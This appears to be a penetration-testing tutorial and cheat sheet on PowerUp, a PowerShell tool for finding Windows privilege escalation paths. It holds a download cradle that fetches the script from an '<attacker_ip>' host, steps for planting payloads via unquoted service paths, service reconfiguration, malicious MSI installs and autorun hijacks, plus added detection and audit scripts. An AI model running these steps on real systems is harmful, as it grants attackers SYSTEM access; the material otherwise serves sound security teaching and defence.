PowerUp: Windows Privilege Escalation
When you’re dropped into a Windows shell during an engagement, one of your top priorities is figuring out how to escalate privileges — ideally from a low-privileged user to SYSTEM. PowerUp, a PowerShell tool from the PowerSploit framework, was made for exactly this.
In this post, we’ll walk through what PowerUp is, how it works, and how to use it to find privilege escalation paths during an assessment. Let’s dig in.
What is PowerUp?
PowerUp is a PowerShell script designed to automatically search for common privilege escalation vectors on Windows systems. It performs a variety of checks to help identify misconfigurations, unquoted service paths, vulnerable registry settings, and more.
Key Features:
- Detects unquoted service paths
- Checks service permissions
- Looks for modifiable registry autoruns
- Finds vulnerable DLL hijack paths
- Identifies AlwaysInstallElevated policy abuse
- Searches for cleartext credentials
- Checks for vulnerable file/folder permissions
Why Use PowerUp?
While you can manually search for privilege escalation vectors using tools like whoami /priv, icacls, or accesschk, PowerUp automates a huge chunk of this work, saving you time and often catching things you’d miss.
PowerUp is perfect for post-exploitation or C2 sessions when you have limited time or need quick wins.
Step-by-Step: Using PowerUp
Step 1: Get PowerUp onto the target
You can get PowerUp from GitHub:
https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1
Transfer it to the victim machine. You can host it on your machine and use Invoke-WebRequest or certutil.
# Example: Download PowerUp.ps1 from a remote server
IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>/PowerUp.ps1')
Or upload it manually if you already have a foothold and file transfer capability.
Step 2: Import the script
Once it’s on the box, import it into the current PowerShell session:
. .\PowerUp.ps1
The leading dot and space (. .\) are required to dot-source the script so you can access its functions.
Step 3: Run the checks
Now run the main scan function:
Invoke-AllChecks
This command runs all PowerUp’s modules and outputs anything potentially useful for escalation.
To save the results for later analysis, pipe the output to a file:
Invoke-AllChecks | Out-File output.txt
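As an added detection example, not part of the original post or of PowerUp itself, this snippet flags PowerShell script-block log entries that contain the PowerUp function names and the download cradle shown above. It assumes Script Block Logging is enabled (event ID 4104 in Microsoft-Windows-PowerShell/Operational) and uses constructed sample text so it runs offline.

```powershell
# Added detection example (not PowerUp code): scan PowerShell script-block text for the PowerUp
# indicators used in this post. Assumes Script Block Logging is on, so the
# Microsoft-Windows-PowerShell/Operational log records event 4104 with the executed script text.
$PowerUpIndicators = @(
    'Invoke-AllChecks', 'Invoke-PrivescAudit', 'Get-ModifiableService',
    'Get-ModifiableRegistryAutoRun', 'Write-HijackDll', 'Write-ServiceBinary',
    'PowerUp.ps1', 'Net.WebClient).DownloadString'   # download cradle from Step 1
)

function Find-PowerUpIndicator {
    param([Parameter(ValueFromPipeline)][string]$ScriptBlockText)
    process {
        # Case-insensitive substring match; PowerShell cmdlet names are not case-sensitive.
        $hits = $PowerUpIndicators | Where-Object { $ScriptBlockText.IndexOf($_, [StringComparison]::OrdinalIgnoreCase) -ge 0 }
        if ($hits) {
            [pscustomobject]@{
                Indicators = ($hits -join ', ')
                Snippet    = $ScriptBlockText.Substring(0, [Math]::Min(80, $ScriptBlockText.Length))
            }
        }
    }
}

# Constructed sample script blocks standing in for 4104 ScriptBlockText values.
$sample = @(
    'Get-ChildItem C:\Users | Measure-Object',
    'IEX (New-Object Net.WebClient).DownloadString(''http://<attacker_ip>/PowerUp.ps1'')',
    'invoke-privescaudit | Out-File audit.txt'
)
$sample | Find-PowerUpIndicator   # flags the second and third entries

# Against the live log (run elevated): ScriptBlockText is the third property of a 4104 event.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#   ForEach-Object { $_.Properties[2].Value } | Find-PowerUpIndicator
```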
Notable PowerUp Functions
Here are some powerful individual modules:
Invoke-ServiceUnquoted # Finds unquoted service paths
Invoke-ServiceDLLHijack # Looks for hijackable service DLL paths
Get-ModifiableService # Finds services that current user can modify
Get-RegAlwaysInstallElevated # Checks for AlwaysInstallElevated
Get-ModifiableRegistryAutoRun # Finds vulnerable autorun registry keys
Example:
Invoke-ServiceUnquoted
# Lists services with unquoted paths that include spaces and are writable
Common Escalation Paths Found with PowerUp
1. Unquoted Service Paths
Invoke-ServiceUnquoted
If a service path looks like:
C:\Program Files\Some Folder\someapp.exe
And you can write to C:\Program Files\Some Folder\, you can drop a malicious executable named someapp.exe in that folder and restart the service.
2. Modifiable Services
Get-ModifiableService
This shows services where you have permissions to reconfigure the binary path. You can point the service to your reverse shell payload and start it.
3. AlwaysInstallElevated
Get-RegAlwaysInstallElevated
If the AlwaysInstallElevated value is set to 1 under both HKCU and HKLM, you can install an MSI package with SYSTEM privileges:
msiexec /quiet /qn /i reverse.msi
4. Registry Autorun Hijack
Get-ModifiableRegistryAutoRun
If an autorun key points to a binary and you can edit it, you can insert your payload for execution on reboot or login.
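As an added defender-side example, not code from the post or from PowerUp itself, the following script reproduces the unquoted service path check (section 1) and the AlwaysInstallElevated check (section 3) and reports the quoted ImagePath that fixes each path finding. It assumes it is run from an elevated PowerShell session; the ACL check is a simplification that ignores deny ordering and generic rights.

```powershell
# Added audit example (not PowerUp's own code): the unquoted-service-path and AlwaysInstallElevated
# checks from above, done from the defender side. Assumes it runs elevated so every ImagePath and ACL is readable.
$LowPrivSids = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', 'S-1-5-4'  # Everyone, Authenticated Users, Users, Interactive

function Test-WritableByStandardUsers {
    param([string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Directory).Access) {
        # Skip denies and ACEs that only apply to children, then look for write-class rights.
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.PropagationFlags -band [Security.AccessControl.PropagationFlags]::InheritOnly) { continue }
        try { $sid = $ace.IdentityReference.Translate([Security.Principal.SecurityIdentifier]).Value } catch { continue }
        if ($LowPrivSids -contains $sid -and "$($ace.FileSystemRights)" -match 'FullControl|Modify|\bWrite\b|CreateFiles') { return $true }
    }
    return $false
}

function Get-UnquotedServicePathFinding {
    # The SCM resolves an unquoted path one space at a time, so C:\Program.exe is tried before
    # C:\Program Files\Some Folder\someapp.exe; each directory along the way is a candidate.
    foreach ($svc in Get-CimInstance Win32_Service) {
        $p = $svc.PathName
        if (-not $p -or $p.StartsWith('"') -or -not ($p -match '^(?i)(.*?\.exe)')) { continue }
        $exe = $Matches[1]
        if ($exe -notmatch ' ') { continue }
        $parts = $exe -split ' '
        $dirs = for ($i = 1; $i -lt $parts.Count; $i++) { Split-Path -Parent ($parts[0..($i - 1)] -join ' ') }
        [pscustomobject]@{
            Service        = $svc.Name
            ImagePath      = $p
            WritableDirs   = (@($dirs | Sort-Object -Unique | Where-Object { Test-WritableByStandardUsers $_ }) -join ';')
            FixedImagePath = '"' + $exe + '"' + $p.Substring($exe.Length)  # quoted binary, arguments kept
        }
    }
}

function Test-AlwaysInstallElevated {
    # Only abusable when both the machine and the user policy hold the value 1.
    $keys = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer', 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
    $vals = foreach ($k in $keys) { (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated }
    return (@($vals | Where-Object { $_ -eq 1 }).Count -eq 2)
}

# Report only services where a standard user could plant a file in the search path.
Get-UnquotedServicePathFinding | Where-Object WritableDirs | Format-Table -AutoSize
"AlwaysInstallElevated set to 1 in both hives: $(Test-AlwaysInstallElevated)"
```

Writing FixedImagePath back to the service's ImagePath value (or via sc.exe config binPath=) closes the unquoted-path finding; setting AlwaysInstallElevated to 0 in both hives closes the MSI one.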
PowerUp Cheat Sheet for Pentesters
Comprehensive Privilege Escalation Discovery on Windows
Core Usage
# Import PowerUp
. .\PowerUp.ps1
# Run all checks
Invoke-AllChecks
# Quick, filtered scan for likely privesc paths
Invoke-PrivescAudit
Full List of PowerUp Functions
| Function | Description | Use Case |
|---|---|---|
| Invoke-AllChecks | Runs all modules in PowerUp | Full enumeration across registry, services, file perms, etc. |
| Invoke-PrivescAudit | High-signal audit of common escalation vectors | Use when you want the most likely and actionable privesc leads |
| Invoke-CheckVuln | Very lightweight vuln summary | Faster and quieter than AllChecks |
| Invoke-ServiceUnquoted | Finds services with unquoted paths | Exploit by dropping payload in writable space within path |
| Invoke-ServiceDLLHijack | Finds hijackable DLL paths in services | Drop malicious DLL to escalate when service runs |
| Get-ModifiableService | Finds services you can reconfigure | Change the binary path to launch your payload |
| Get-ServiceDetail | Shows full config of a specific service | Investigate interesting services |
| Get-InterestingServices | Lists “interesting” services (e.g., backup, VNC, etc.) | Good for manual review |
| Get-ServicePermission | Shows service permissions for the current user | Check if you can start/stop/configure services |
| Get-ServiceFilePermission | Shows access permissions on service executables | Check if you can overwrite them |
| Get-ModifiableRegistryAutoRun | Finds writable autorun registry keys | Modify for persistence or escalation |
| Get-RegAlwaysInstallElevated | Checks for AlwaysInstallElevated policy | MSI abuse for SYSTEM privilege |
| Invoke-AllAutoruns | Lists all registry-based autoruns | Look for persistence vectors |
| Get-ModifiableScheduledTask | Lists scheduled tasks you can modify | Escalate via scheduled task hijack |
| Write-HijackDll | Creates a simple DLL payload for hijacking | Use with vulnerable services or paths |
| Write-ServiceBinary | Writes a binary to a writable service path | Helps exploit writable paths or binaries |
| Invoke-InstallElevatedCheck | Standalone AlwaysInstallElevated checker | Same as Get-RegAlwaysInstallElevated, alternative call |
Quick Payload Usage Example
# Check for AlwaysInstallElevated vulnerability
Get-RegAlwaysInstallElevated
# Create a malicious service DLL
Write-HijackDll -Path "C:\Users\Public\evil.dll" -Command "cmd.exe"
# Write a binary to a service path you control
Write-ServiceBinary -ServiceName "VulnService" -Command "C:\Users\Public\reverse.exe"
Field Tips
- Use Invoke-PrivescAudit first if you want fast, actionable results.
- Always run . .\PowerUp.ps1 (dot sourcing) to expose functions in memory.
- Pipe output to a file if you’re in a noisy shell: Invoke-PrivescAudit | Out-File audit.txt
- If you’re being noisy or need to stay low-profile, skip Invoke-AllChecks.
